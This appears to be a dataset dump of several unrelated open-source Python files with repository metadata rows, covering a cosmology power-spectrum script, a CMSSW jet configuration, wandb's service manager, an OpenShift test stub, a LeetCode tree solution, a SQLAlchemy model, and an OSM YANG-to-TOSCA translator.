if not os.path.exists(class_datadir): os.makedirs(class_datadir)
if not os.path.exists(ccl_datadir): os.makedirs(ccl_datadir)
# Get root filename for CLASS and CCL filenames
root = "%s/%s" % (class_datadir, PREFIX)
ccl_root = "%s/%s" % (ccl_datadir, PREFIX)
# Generate sample points on Latin hypercube
sample_points = generate_latin_hypercube( samples=NSAMP, param_dict=param_dict,
class_root=CLASS_ROOT, seed=SEED )
save_hypercube("%s_params.dat" % root, sample_points)
# Generate CLASS .ini files
print("Writing CLASS linear .ini files")
generate_class_ini(sample_points, root="%s_lin_std" % root,
nonlinear=False, redshifts=ZVALS)
generate_class_ini(sample_points, root="%s_lin_pre" % root,
nonlinear=False, redshifts=ZVALS)
print("Writing CLASS nonlinear .ini files")
generate_class_ini(sample_points, root="%s_nl_std" % root,
nonlinear=True, redshifts=ZVALS)
generate_class_ini(sample_points, root="%s_nl_pre" % root,
nonlinear=True, redshifts=ZVALS)
# Run CLASS on generated .ini files
print("Running CLASS on .ini files")
run_class(fname_pattern="%s_lin_std_?????.ini" % root,
class_root=CLASS_ROOT, precision=False)
run_class(fname_pattern="%s_lin_pre_?????.ini" % root,
class_root=CLASS_ROOT, precision=True)
run_class(fname_pattern="%s_nl_std_?????.ini" % root,
class_root=CLASS_ROOT, precision=False)
run_class(fname_pattern="%s_nl_pre_?????.ini" % root,
class_root=CLASS_ROOT, precision=True)
# Run CCL for the same sets of parameters
generate_ccl_pspec(sample_points, ccl_root,
class_data_root="%s_lin_std" % root,
zvals=ZVALS, default_params={'mnu': 0.}, mode='std')
generate_ccl_pspec(sample_points, ccl_root,
class_data_root="%s_lin_pre" % root,
zvals=ZVALS, default_params={'mnu': 0.}, mode='pre')
generate_ccl_pspec(sample_points, ccl_root,
class_data_root="%s_nl_std" % root,
zvals=ZVALS, default_params={'mnu': 0.},
nonlin=True, mode='std')
generate_ccl_pspec(sample_points, ccl_root,
class_data_root="%s_nl_pre" % root,
zvals=ZVALS, default_params={'mnu': 0.},
nonlin=True, mode='pre')
| [
"[email protected]"
] | |
4db596e6c7138de5c3da2c08096ca5ff74647e04 | 0bc777a57e39c466a9482af9a6eda698ab3c1437 | /HeavyIonsAnalysis/JetAnalysis/python/jets/akPu3PFJetSequence_PbPb_data_cff.py | 51ef615578166024b0ea28233b748df5a4cde187 | [] | no_license | stahlleiton/cmssw | 3c78d80b9372fdf2a37f424372504b23c9dc4f78 | fcfda663dc8c315b505eb6bcc7e936401c01c4d1 | refs/heads/EWQAnalysis2017_8030 | 2023-08-23T13:50:40.837198 | 2017-11-09T17:45:31 | 2017-11-09T17:45:31 | 45,795,305 | 0 | 3 | null | 2021-04-30T07:36:28 | 2015-11-08T19:28:54 | C++ | UTF-8 | Python | false | false | 14,698 | py |
import FWCore.ParameterSet.Config as cms
from HeavyIonsAnalysis.JetAnalysis.patHeavyIonSequences_cff import patJetGenJetMatch, patJetPartonMatch, patJetCorrFactors, patJets
from HeavyIonsAnalysis.JetAnalysis.inclusiveJetAnalyzer_cff import *
from HeavyIonsAnalysis.JetAnalysis.bTaggers_cff import *
from RecoJets.JetProducers.JetIDParams_cfi import *
from RecoJets.JetProducers.nJettinessAdder_cfi import Njettiness
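# Builds the anti-kT R=0.3, PU-subtracted particle-flow (akPu3PF) jet chain for PbPb data:
# gen-jet matching, L2/L3 jet-energy corrections, track association, impact-parameter,
# secondary-vertex and soft-muon b-taggers, N-jettiness, patJets with b-tagging and the
# jet analyzer, wired together into the cms.Sequence objects defined at the bottom.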
akPu3PFmatch = patJetGenJetMatch.clone(
src = cms.InputTag("akPu3PFJets"),
matched = cms.InputTag("ak3HiSignalGenJets"),
resolveByMatchQuality = cms.bool(False),
maxDeltaR = 0.3
)
akPu3PFmatchGroomed = patJetGenJetMatch.clone(
src = cms.InputTag("ak3HiSignalGenJets"),
matched = cms.InputTag("ak3HiSignalGenJets"),
resolveByMatchQuality = cms.bool(False),
maxDeltaR = 0.3
)
akPu3PFparton = patJetPartonMatch.clone(src = cms.InputTag("akPu3PFJets")
)
akPu3PFcorr = patJetCorrFactors.clone(
useNPV = cms.bool(False),
useRho = cms.bool(False),
# primaryVertices = cms.InputTag("hiSelectedVertex"),
levels = cms.vstring('L2Relative','L3Absolute'),
src = cms.InputTag("akPu3PFJets"),
payload = "AKPu3PF_offline"
)
akPu3PFJetID= cms.EDProducer('JetIDProducer', JetIDParams, src = cms.InputTag('akPu3CaloJets'))
#akPu3PFclean = heavyIonCleanedGenJets.clone(src = cms.InputTag('ak3HiSignalGenJets'))
akPu3PFbTagger = bTaggers("akPu3PF",0.3)
#create objects locally since they dont load properly otherwise
#akPu3PFmatch = akPu3PFbTagger.match
akPu3PFparton = patJetPartonMatch.clone(src = cms.InputTag("akPu3PFJets"), matched = cms.InputTag("hiSignalGenParticles"))
akPu3PFPatJetFlavourAssociationLegacy = akPu3PFbTagger.PatJetFlavourAssociationLegacy
akPu3PFPatJetPartons = akPu3PFbTagger.PatJetPartons
akPu3PFJetTracksAssociatorAtVertex = akPu3PFbTagger.JetTracksAssociatorAtVertex
akPu3PFJetTracksAssociatorAtVertex.tracks = cms.InputTag("highPurityTracks")
akPu3PFSimpleSecondaryVertexHighEffBJetTags = akPu3PFbTagger.SimpleSecondaryVertexHighEffBJetTags
akPu3PFSimpleSecondaryVertexHighPurBJetTags = akPu3PFbTagger.SimpleSecondaryVertexHighPurBJetTags
akPu3PFCombinedSecondaryVertexBJetTags = akPu3PFbTagger.CombinedSecondaryVertexBJetTags
akPu3PFCombinedSecondaryVertexV2BJetTags = akPu3PFbTagger.CombinedSecondaryVertexV2BJetTags
akPu3PFJetBProbabilityBJetTags = akPu3PFbTagger.JetBProbabilityBJetTags
akPu3PFSoftPFMuonByPtBJetTags = akPu3PFbTagger.SoftPFMuonByPtBJetTags
akPu3PFSoftPFMuonByIP3dBJetTags = akPu3PFbTagger.SoftPFMuonByIP3dBJetTags
akPu3PFTrackCountingHighEffBJetTags = akPu3PFbTagger.TrackCountingHighEffBJetTags
akPu3PFTrackCountingHighPurBJetTags = akPu3PFbTagger.TrackCountingHighPurBJetTags
akPu3PFPatJetPartonAssociationLegacy = akPu3PFbTagger.PatJetPartonAssociationLegacy
akPu3PFImpactParameterTagInfos = akPu3PFbTagger.ImpactParameterTagInfos
akPu3PFImpactParameterTagInfos.primaryVertex = cms.InputTag("offlinePrimaryVertices")
akPu3PFJetProbabilityBJetTags = akPu3PFbTagger.JetProbabilityBJetTags
akPu3PFSecondaryVertexTagInfos = akPu3PFbTagger.SecondaryVertexTagInfos
akPu3PFSimpleSecondaryVertexHighEffBJetTags = akPu3PFbTagger.SimpleSecondaryVertexHighEffBJetTags
akPu3PFSimpleSecondaryVertexHighPurBJetTags = akPu3PFbTagger.SimpleSecondaryVertexHighPurBJetTags
akPu3PFCombinedSecondaryVertexBJetTags = akPu3PFbTagger.CombinedSecondaryVertexBJetTags
akPu3PFCombinedSecondaryVertexV2BJetTags = akPu3PFbTagger.CombinedSecondaryVertexV2BJetTags
akPu3PFSecondaryVertexNegativeTagInfos = akPu3PFbTagger.SecondaryVertexNegativeTagInfos
akPu3PFNegativeSimpleSecondaryVertexHighEffBJetTags = akPu3PFbTagger.NegativeSimpleSecondaryVertexHighEffBJetTags
akPu3PFNegativeSimpleSecondaryVertexHighPurBJetTags = akPu3PFbTagger.NegativeSimpleSecondaryVertexHighPurBJetTags
akPu3PFNegativeCombinedSecondaryVertexBJetTags = akPu3PFbTagger.NegativeCombinedSecondaryVertexBJetTags
akPu3PFPositiveCombinedSecondaryVertexBJetTags = akPu3PFbTagger.PositiveCombinedSecondaryVertexBJetTags
akPu3PFNegativeCombinedSecondaryVertexV2BJetTags = akPu3PFbTagger.NegativeCombinedSecondaryVertexV2BJetTags
akPu3PFPositiveCombinedSecondaryVertexV2BJetTags = akPu3PFbTagger.PositiveCombinedSecondaryVertexV2BJetTags
akPu3PFSoftPFMuonsTagInfos = akPu3PFbTagger.SoftPFMuonsTagInfos
akPu3PFSoftPFMuonsTagInfos.primaryVertex = cms.InputTag("offlinePrimaryVertices")
akPu3PFSoftPFMuonBJetTags = akPu3PFbTagger.SoftPFMuonBJetTags
akPu3PFSoftPFMuonByIP3dBJetTags = akPu3PFbTagger.SoftPFMuonByIP3dBJetTags
akPu3PFSoftPFMuonByPtBJetTags = akPu3PFbTagger.SoftPFMuonByPtBJetTags
akPu3PFNegativeSoftPFMuonByPtBJetTags = akPu3PFbTagger.NegativeSoftPFMuonByPtBJetTags
akPu3PFPositiveSoftPFMuonByPtBJetTags = akPu3PFbTagger.PositiveSoftPFMuonByPtBJetTags
akPu3PFPatJetFlavourIdLegacy = cms.Sequence(akPu3PFPatJetPartonAssociationLegacy*akPu3PFPatJetFlavourAssociationLegacy)
#Not working with our PU sub, but keep it here for reference
#akPu3PFPatJetFlavourAssociation = akPu3PFbTagger.PatJetFlavourAssociation
#akPu3PFPatJetFlavourId = cms.Sequence(akPu3PFPatJetPartons*akPu3PFPatJetFlavourAssociation)
akPu3PFJetBtaggingIP = cms.Sequence(akPu3PFImpactParameterTagInfos *
(akPu3PFTrackCountingHighEffBJetTags +
akPu3PFTrackCountingHighPurBJetTags +
akPu3PFJetProbabilityBJetTags +
akPu3PFJetBProbabilityBJetTags
)
)
akPu3PFJetBtaggingSV = cms.Sequence(akPu3PFImpactParameterTagInfos
*
akPu3PFSecondaryVertexTagInfos
* (akPu3PFSimpleSecondaryVertexHighEffBJetTags+
akPu3PFSimpleSecondaryVertexHighPurBJetTags+
akPu3PFCombinedSecondaryVertexBJetTags+
akPu3PFCombinedSecondaryVertexV2BJetTags
)
)
akPu3PFJetBtaggingNegSV = cms.Sequence(akPu3PFImpactParameterTagInfos
*
akPu3PFSecondaryVertexNegativeTagInfos
* (akPu3PFNegativeSimpleSecondaryVertexHighEffBJetTags+
akPu3PFNegativeSimpleSecondaryVertexHighPurBJetTags+
akPu3PFNegativeCombinedSecondaryVertexBJetTags+
akPu3PFPositiveCombinedSecondaryVertexBJetTags+
akPu3PFNegativeCombinedSecondaryVertexV2BJetTags+
akPu3PFPositiveCombinedSecondaryVertexV2BJetTags
)
)
akPu3PFJetBtaggingMu = cms.Sequence(akPu3PFSoftPFMuonsTagInfos * (akPu3PFSoftPFMuonBJetTags
+
akPu3PFSoftPFMuonByIP3dBJetTags
+
akPu3PFSoftPFMuonByPtBJetTags
+
akPu3PFNegativeSoftPFMuonByPtBJetTags
+
akPu3PFPositiveSoftPFMuonByPtBJetTags
)
)
akPu3PFJetBtagging = cms.Sequence(akPu3PFJetBtaggingIP
*akPu3PFJetBtaggingSV
*akPu3PFJetBtaggingNegSV
# *akPu3PFJetBtaggingMu
)
akPu3PFpatJetsWithBtagging = patJets.clone(jetSource = cms.InputTag("akPu3PFJets"),
genJetMatch = cms.InputTag("akPu3PFmatch"),
genPartonMatch = cms.InputTag("akPu3PFparton"),
jetCorrFactorsSource = cms.VInputTag(cms.InputTag("akPu3PFcorr")),
JetPartonMapSource = cms.InputTag("akPu3PFPatJetFlavourAssociationLegacy"),
JetFlavourInfoSource = cms.InputTag("akPu3PFPatJetFlavourAssociation"),
trackAssociationSource = cms.InputTag("akPu3PFJetTracksAssociatorAtVertex"),
useLegacyJetMCFlavour = True,
discriminatorSources = cms.VInputTag(cms.InputTag("akPu3PFSimpleSecondaryVertexHighEffBJetTags"),
cms.InputTag("akPu3PFSimpleSecondaryVertexHighPurBJetTags"),
cms.InputTag("akPu3PFCombinedSecondaryVertexBJetTags"),
cms.InputTag("akPu3PFCombinedSecondaryVertexV2BJetTags"),
cms.InputTag("akPu3PFJetBProbabilityBJetTags"),
cms.InputTag("akPu3PFJetProbabilityBJetTags"),
#cms.InputTag("akPu3PFSoftPFMuonByPtBJetTags"),
#cms.InputTag("akPu3PFSoftPFMuonByIP3dBJetTags"),
cms.InputTag("akPu3PFTrackCountingHighEffBJetTags"),
cms.InputTag("akPu3PFTrackCountingHighPurBJetTags"),
),
jetIDMap = cms.InputTag("akPu3PFJetID"),
addBTagInfo = True,
addTagInfos = True,
addDiscriminators = True,
addAssociatedTracks = True,
addJetCharge = False,
addJetID = False,
getJetMCFlavour = False,
addGenPartonMatch = False,
addGenJetMatch = False,
embedGenJetMatch = False,
embedGenPartonMatch = False,
# embedCaloTowers = False,
# embedPFCandidates = True
)
akPu3PFNjettiness = Njettiness.clone(
src = cms.InputTag("akPu3PFJets"),
R0 = cms.double( 0.3)
)
akPu3PFpatJetsWithBtagging.userData.userFloats.src += ['akPu3PFNjettiness:tau1','akPu3PFNjettiness:tau2','akPu3PFNjettiness:tau3']
akPu3PFJetAnalyzer = inclusiveJetAnalyzer.clone(jetTag = cms.InputTag("akPu3PFpatJetsWithBtagging"),
genjetTag = 'ak3HiSignalGenJets',
rParam = 0.3,
matchJets = cms.untracked.bool(False),
matchTag = 'patJetsWithBtagging',
pfCandidateLabel = cms.untracked.InputTag('particleFlowTmp'),
trackTag = cms.InputTag("hiGeneralTracks"),
fillGenJets = False,
isMC = False,
doSubEvent = False,
useHepMC = cms.untracked.bool(False),
genParticles = cms.untracked.InputTag("genParticles"),
eventInfoTag = cms.InputTag("generator"),
doLifeTimeTagging = cms.untracked.bool(True),
doLifeTimeTaggingExtras = cms.untracked.bool(False),
bTagJetName = cms.untracked.string("akPu3PF"),
jetName = cms.untracked.string("akPu3PF"),
genPtMin = cms.untracked.double(5),
hltTrgResults = cms.untracked.string('TriggerResults::'+'HISIGNAL'),
doTower = cms.untracked.bool(True),
doSubJets = cms.untracked.bool(False),
doGenSubJets = cms.untracked.bool(False),
subjetGenTag = cms.untracked.InputTag("ak3GenJets"),
doGenTaus = cms.untracked.bool(False),
genTau1 = cms.InputTag("ak3GenNjettiness","tau1"),
genTau2 = cms.InputTag("ak3GenNjettiness","tau2"),
genTau3 = cms.InputTag("ak3GenNjettiness","tau3"),
doGenSym = cms.untracked.bool(False),
genSym = cms.InputTag("ak3GenJets","sym"),
genDroppedBranches = cms.InputTag("ak3GenJets","droppedBranches")
)
akPu3PFJetSequence_mc = cms.Sequence(
#akPu3PFclean
#*
akPu3PFmatch
#*
#akPu3PFmatchGroomed
*
akPu3PFparton
*
akPu3PFcorr
*
#akPu3PFJetID
#*
akPu3PFPatJetFlavourIdLegacy
#*
#akPu3PFPatJetFlavourId # Use legacy algo till PU implemented
*
akPu3PFJetTracksAssociatorAtVertex
*
akPu3PFJetBtagging
*
akPu3PFNjettiness #No constituents for calo jets in pp. Must be removed for pp calo jets but I'm not sure how to do this transparently (Marta)
*
akPu3PFpatJetsWithBtagging
*
akPu3PFJetAnalyzer
)
akPu3PFJetSequence_data = cms.Sequence(akPu3PFcorr
*
#akPu3PFJetID
#*
akPu3PFJetTracksAssociatorAtVertex
*
akPu3PFJetBtagging
*
akPu3PFNjettiness
*
akPu3PFpatJetsWithBtagging
*
akPu3PFJetAnalyzer
)
akPu3PFJetSequence_jec = cms.Sequence(akPu3PFJetSequence_mc)
akPu3PFJetSequence_mb = cms.Sequence(akPu3PFJetSequence_mc)
akPu3PFJetSequence = cms.Sequence(akPu3PFJetSequence_data)
| [
"[email protected]"
] | |
1416874157729825714165b2eecc1af24e692c63 | d3196fb38078fdbe966bd5af8a8a4f2924a47c20 | /wandb/sdk/wandb_manager.py | 69e8c503a571a70e1c710938889cb33c97a665cf | [
"MIT"
] | permissive | morganmcg1/client | a1ae01ea302f13a6c9850972411ecabcb900dbc6 | 099f7aa938fb62c5a5d3e12f7d2067196498b67c | refs/heads/master | 2023-09-06T01:14:40.282234 | 2021-11-13T03:01:01 | 2021-11-13T03:01:01 | 427,620,124 | 0 | 0 | MIT | 2021-11-13T09:22:12 | 2021-11-13T09:22:11 | null | UTF-8 | Python | false | false | 3,831 | py | """Manage wandb processes.
Create a grpc manager channel.
"""
import atexit
import multiprocessing
import os
from typing import Callable, Optional, Tuple, TYPE_CHECKING
from wandb import env
from wandb.sdk.lib.exit_hooks import ExitHooks
if TYPE_CHECKING:
from wandb.sdk.service import service
from wandb.sdk.wandb_settings import Settings
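# The manager advertises its service endpoint to child processes through a single
# environment variable (env.SERVICE) holding a "<version>-<pid>-<port>" token,
# e.g. "1-4242-50051" parses to version "1", pid 4242, port 50051 (values hypothetical).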
class _ManagerToken:
_token_str: Optional[str]
def __init__(self) -> None:
self._token_str = None
def probe(self) -> None:
token = os.environ.get(env.SERVICE)
if not token:
return
self._token_str = token
def configure(self, port: int) -> None:
version = "1"
pid = os.getpid()
token = "-".join([version, str(pid), str(port)])
os.environ[env.SERVICE] = token
self._token_str = token
def parse(self) -> Tuple[str, int, int]:
assert self._token_str
parts = self._token_str.split("-")
assert len(parts) == 3, f"token must have 3 parts: {parts}"
# TODO: make more robust?
version, pid_str, port_str = parts
pid_int = int(pid_str)
port_int = int(port_str)
return version, pid_int, port_int
@property
def token(self) -> Optional[str]:
return self._token_str
@property
def port(self) -> int:
_, _, port = self.parse()
return port
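# _Manager owns the lifecycle of the local wandb service: it reuses an already advertised
# token if one exists, otherwise spawns the service, publishes the token and registers an
# atexit hook so the service is torn down with the interpreter's exit code.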
class _Manager:
_token: _ManagerToken
_atexit_lambda: Optional[Callable[[], None]]
_hooks: Optional[ExitHooks]
def __init__(self) -> None:
# TODO: warn if user doesnt have grpc installed
from wandb.sdk.service import service
self._atexit_lambda = None
self._hooks = None
self._token = _ManagerToken()
self._service = service._Service()
self._setup_mp()
self._setup()
def _setup_mp(self) -> None:
# NOTE: manager does not support fork yet, support coming later
start_method = multiprocessing.get_start_method(allow_none=True)
assert start_method != "fork", "start method 'fork' is not supported yet"
if start_method is None:
multiprocessing.set_start_method("spawn")
def _setup(self) -> None:
self._token.probe()
if not self._token.token:
self._setup_service()
port = self._token.port
self._service.connect(port=port)
def _setup_service(self) -> None:
port = self._service.start()
assert port
self._token.configure(port=port)
self._atexit_setup()
def _atexit_setup(self) -> None:
self._atexit_lambda = lambda: self._atexit_teardown()
self._hooks = ExitHooks()
self._hooks.hook()
atexit.register(self._atexit_lambda)
def _atexit_teardown(self) -> None:
exit_code = self._hooks.exit_code if self._hooks else 0
self._teardown(exit_code)
def _teardown(self, exit_code: int) -> None:
if self._atexit_lambda:
atexit.unregister(self._atexit_lambda)
self._atexit_lambda = None
self._inform_teardown(exit_code)
def _get_service(self) -> "service._Service":
return self._service
def _inform_init(self, settings: "Settings", run_id: str) -> None:
svc = self._service
assert svc
svc._svc_inform_init(settings=settings, run_id=run_id)
def _inform_attach(self, attach_id: str) -> None:
svc = self._service
assert svc
svc._svc_inform_attach(attach_id=attach_id)
def _inform_finish(self, run_id: str = None) -> None:
svc = self._service
assert svc
svc._svc_inform_finish(run_id=run_id)
def _inform_teardown(self, exit_code: int) -> None:
svc = self._service
assert svc
svc._svc_inform_teardown(exit_code)
| [
"[email protected]"
] | |
a778f90e545e61c423df01e02861dbf5ed9a4647 | 02467e9975b50c14b4dc8cdc6dc03748f9aa8245 | /openshift/test/test_v1_scale_status.py | 2fa26692bfeeef412de792161c348de67a929f4f | [
"Apache-2.0"
] | permissive | ashcrow/python-openshift | 3995e3c4b72bf52a62bc6b07dabf3d0f709444ae | 74c9ade612def941938016385842631342e926de | refs/heads/master | 2021-01-11T19:29:04.419005 | 2017-01-18T19:31:58 | 2017-01-18T19:31:58 | 79,377,387 | 0 | 0 | null | 2017-01-18T19:46:04 | 2017-01-18T19:46:04 | null | UTF-8 | Python | false | false | 4,142 | py | # coding: utf-8
"""
OpenShift API (with Kubernetes)
OpenShift provides builds, application lifecycle, image content management, and administrative policy on top of Kubernetes. The API allows consistent management of those objects. All API operations are authenticated via an Authorization bearer token that is provided for service accounts as a generated secret (in JWT form) or via the native OAuth endpoint located at /oauth/authorize. Core infrastructure components may use openshift.client certificates that require no authentication. All API operations return a 'resourceVersion' string that represents the version of the object in the underlying storage. The standard LIST operation performs a snapshot read of the underlying objects, returning a resourceVersion representing a consistent version of the listed objects. The WATCH operation allows all updates to a set of objects after the provided resourceVersion to be observed by a openshift.client. By listing and beginning a watch from the returned resourceVersion, openshift.clients may observe a consistent view of the state of one or more objects. Note that WATCH always returns the update after the provided resourceVersion. Watch may be extended a limited time in the past - using etcd 2 the watch window is 1000 events (which on a large cluster may only be a few tens of seconds) so openshift.clients must explicitly handle the \"watch to old error\" by re-listing. Objects are divided into two rough categories - those that have a lifecycle and must reflect the state of the cluster, and those that have no state. Objects with lifecycle typically have three main sections: * 'metadata' common to all objects * a 'spec' that represents the desired state * a 'status' that represents how much of the desired state is reflected on the cluster at the current time Objects that have no state have 'metadata' but may lack a 'spec' or 'status' section. Objects are divided into those that are namespace scoped (only exist inside of a namespace) and those that are cluster scoped (exist outside of a namespace). A namespace scoped resource will be deleted when the namespace is deleted and cannot be created if the namespace has not yet been created or is in the process of deletion. Cluster scoped resources are typically only accessible to admins - resources like nodes, persistent volumes, and cluster policy. All objects have a schema that is a combination of the 'kind' and 'apiVersion' fields. This schema is additive only for any given version - no backwards incompatible changes are allowed without incrementing the apiVersion. The server will return and accept a number of standard responses that share a common schema - for instance, the common error type is 'unversioned.Status' (described below) and will be returned on any error from the API server. The API is available in multiple serialization formats - the default is JSON (Accept: application/json and Content-Type: application/json) but openshift.clients may also use YAML (application/yaml) or the native Protobuf schema (application/vnd.kubernetes.protobuf). Note that the format of the WATCH API call is slightly different - for JSON it returns newline delimited objects while for Protobuf it returns length-delimited frames (4 bytes in network-order) that contain a 'versioned.Watch' Protobuf object. See the OpenShift documentation at https://docs.openshift.org for more information.
OpenAPI spec version: v1.5.0-alpha1
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import os
import sys
import unittest
import openshift.client
from openshift.client.rest import ApiException
from openshift.client.models.v1_scale_status import V1ScaleStatus
class TestV1ScaleStatus(unittest.TestCase):
""" V1ScaleStatus unit test stubs """
def setUp(self):
pass
def tearDown(self):
pass
def testV1ScaleStatus(self):
"""
Test V1ScaleStatus
"""
model = openshift.client.models.v1_scale_status.V1ScaleStatus()
if __name__ == '__main__':
unittest.main()
| [
"[email protected]"
] | |
bfd99c37854c269ae7937012f17c63e5e0f061cd | 223590e81400eb8192aeb0a56b36b5a80408d4b4 | /House Robber III.py | 584a90ed9a8be182d31caf96c6718832136be16d | [] | no_license | TianyaoHua/LeetCodeSolutions | c47fd3b6ae0bf60c0656ce12fb88290672c129ed | 418172cee1bf48bb2aed3b84fe8b4defd9ef4fdf | refs/heads/master | 2020-03-06T19:48:13.338630 | 2018-08-10T18:27:52 | 2018-08-10T18:27:52 | 127,037,907 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 927 | py | # Definition for a binary tree node.
class TreeNode(object):
def __init__(self, x):
self.val = x
self.left = None
self.right = None
class Solution(object):
def value(self, node, dict):
if not node:
return 0
elif node in dict:
return dict[node]
else:
            money1 = self.value(node.left, dict) + self.value(node.right, dict)
money2 = node.val
if node.left:
money2 += (self.value(node.left.left, dict) + self.value(node.left.right, dict))
if node.right:
money2 += (self.value(node.right.left, dict) + self.value(node.right.right, dict))
money = max(money1, money2)
dict.update({node: money})
return money
def rob(self, root):
"""
:type root: TreeNode
:rtype: int
"""
return self.value(root, {}) | [
"[email protected]"
] | |
1226dd2c5a9a51b542246bedd7bd3c1873fdbad6 | 20f951bd927e4e5cde8ef7781813fcf0d51cc3ea | /fossir/modules/auth/models/registration_requests.py | 2b82b271bd15c697c17e87bacc2dcbf1d924edf3 | [] | no_license | HodardCodeclub/SoftwareDevelopment | 60a0fbab045cb1802925d4dd5012d5b030c272e0 | 6300f2fae830c0c2c73fe0afd9c684383bce63e5 | refs/heads/master | 2021-01-20T00:30:02.800383 | 2018-04-27T09:28:25 | 2018-04-27T09:28:25 | 101,277,325 | 0 | 2 | null | null | null | null | UTF-8 | Python | false | false | 2,160 | py |
from __future__ import unicode_literals
from sqlalchemy.dialects.postgresql import ARRAY, JSON
from werkzeug.datastructures import MultiDict
from fossir.core.db import db
from fossir.util.locators import locator_property
from fossir.util.string import format_repr, return_ascii
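# A pending account-registration request: the requested e-mail (stored lowercase) plus any
# extra addresses, the submitted user data, the multipass identity payload (MultiDict
# round-tripping is handled by the property below) and associated settings.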
class RegistrationRequest(db.Model):
__tablename__ = 'registration_requests'
__table_args__ = (
db.CheckConstraint('email = lower(email)', 'lowercase_email'),
{'schema': 'users'}
)
id = db.Column(
db.Integer,
primary_key=True
)
comment = db.Column(
db.Text,
nullable=False,
default=''
)
email = db.Column(
db.String,
unique=True,
nullable=False,
index=True
)
extra_emails = db.Column(
ARRAY(db.String),
nullable=False,
default=[]
)
user_data = db.Column(
JSON,
nullable=False
)
_identity_data = db.Column(
'identity_data',
JSON,
nullable=False
)
settings = db.Column(
JSON,
nullable=False
)
@locator_property
def locator(self):
return {'request_id': self.id}
@property
def identity_data(self):
identity_data = self._identity_data.copy()
# if we have data in identity_data, it was converted from a
# MultiDict so we need to convert it back.
if 'data' in identity_data:
tmp = MultiDict()
tmp.update(self._identity_data['data'])
identity_data['data'] = tmp
return identity_data
@identity_data.setter
def identity_data(self, identity_data):
identity_data = identity_data.copy()
# `identity_data['data']` for multipass-based identities is a
# MultiDict, but json-encoding it would lose all extra values
# for a key, so we convert it to a dict of lists first
if 'data' in identity_data:
identity_data['data'] = dict(identity_data['data'].lists())
self._identity_data = identity_data
@return_ascii
def __repr__(self):
return format_repr(self, 'id', 'email')
| [
"[email protected]"
] | |
7b571d83f84608ebeeaddbfae06938549a457d9b | 54d17336ca03801bd9c9ef37be8642b332ab71c4 | /osm/SO/common/python/rift/mano/yang_translator/rwmano/translate_descriptors.py | 2023db5a8ce00b6b1b6982b49c0b0047939c92fb | [] | no_license | dennis-me/Pishahang | 2428379c4f7d3ee85df4b85727ce92e8fe69957a | cdd0abe80a76d533d08a51c7970d8ded06624b7d | refs/heads/master | 2020-09-07T12:35:54.734782 | 2020-01-24T20:11:33 | 2020-01-24T20:11:33 | 220,782,212 | 2 | 0 | null | 2019-11-10T11:46:44 | 2019-11-10T11:46:43 | null | UTF-8 | Python | false | false | 8,136 | py | #
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
# Copyright 2016 RIFT.io Inc
import importlib
import os
from rift.mano.yang_translator.common.exception import YangClassAttributeError
from rift.mano.yang_translator.common.exception import YangClassImportError
from rift.mano.yang_translator.common.exception import YangModImportError
from rift.mano.yang_translator.common.utils import _
from rift.mano.yang_translator.conf.config import ConfigProvider \
as translatorConfig
from rift.mano.yang_translator.rwmano.syntax.tosca_resource \
import ToscaResource
class TranslateDescriptors(object):
'''Translate YANG NodeTemplates to RIFT.io MANO Resources.'''
YANG_DESC = (NSD, VNFD) = ('nsd', 'vnfd')
###########################
# Module utility Functions
# for dynamic class loading
###########################
YANG_TO_TOSCA_TYPE = None
def _load_classes(log, locations, classes):
'''Dynamically load all the classes from the given locations.'''
for cls_path in locations:
# Use the absolute path of the class path
abs_path = os.path.dirname(os.path.abspath(__file__))
abs_path = abs_path.replace('rift/mano/yang_translator/rwmano',
cls_path)
log.debug(_("Loading classes from %s") % abs_path)
# Grab all the yang type module files in the given path
mod_files = [f for f in os.listdir(abs_path) if (
f.endswith('.py') and
not f.startswith('__init__') and
f.startswith('yang_'))]
# For each module, pick out the target translation class
for f in mod_files:
f_name, ext = f.rsplit('.', 1)
mod_name = cls_path + '/' + f_name
mod_name = mod_name.replace('/', '.')
try:
mod = importlib.import_module(mod_name)
target_name = getattr(mod, 'TARGET_CLASS_NAME')
clazz = getattr(mod, target_name)
classes.append(clazz)
except ImportError:
raise YangModImportError(mod_name=mod_name)
except AttributeError:
if target_name:
raise YangClassImportError(name=target_name,
mod_name=mod_name)
else:
# TARGET_CLASS_NAME is not defined in module.
# Re-raise the exception
raise
def _generate_type_map(log):
'''Generate YANG translation types map.
Load user defined classes from location path specified in conf file.
Base classes are located within the yang directory.
'''
# Base types directory
BASE_PATH = 'rift/mano/yang_translator/rwmano/yang'
# Custom types directory defined in conf file
custom_path = translatorConfig.get_value('DEFAULT',
'custom_types_location')
# First need to load the parent module, for example 'contrib.mano',
# for all of the dynamically loaded classes.
classes = []
TranslateDescriptors._load_classes(log,
(BASE_PATH, custom_path),
classes)
try:
types_map = {clazz.yangtype: clazz for clazz in classes}
log.debug(_("Type maps loaded: {}").format(types_map.keys()))
except AttributeError as e:
raise YangClassAttributeError(message=e.message)
return types_map
def __init__(self, log, yangs, tosca_template, vnfd_files=None):
self.log = log
self.yangs = yangs
self.tosca_template = tosca_template
self.vnfd_files = vnfd_files
# list of all TOSCA resources generated
self.tosca_resources = []
self.metadata = {}
log.debug(_('Mapping between YANG nodetemplate and TOSCA resource.'))
def translate(self):
if TranslateDescriptors.YANG_TO_TOSCA_TYPE is None:
TranslateDescriptors.YANG_TO_TOSCA_TYPE = \
TranslateDescriptors._generate_type_map(self.log)
return self._translate_yang()
def translate_metadata(self):
"""Translate and store the metadata in instance"""
FIELDS_MAP = {
'ID': 'name',
'vendor': 'vendor',
'version': 'version',
}
metadata = {}
# Initialize to default values
metadata['name'] = 'yang_to_tosca'
metadata['vendor'] = 'RIFT.io'
metadata['version'] = '1.0'
if 'nsd' in self.yangs:
            yang_meta = self.yangs['nsd'][0]
        elif 'vnfd' in self.yangs:
            yang_meta = self.yangs['vnfd'][0]
for key in FIELDS_MAP:
if key in yang_meta.keys():
metadata[key] = str(yang_meta[FIELDS_MAP[key]])
self.log.debug(_("Metadata {0}").format(metadata))
self.metadata = metadata
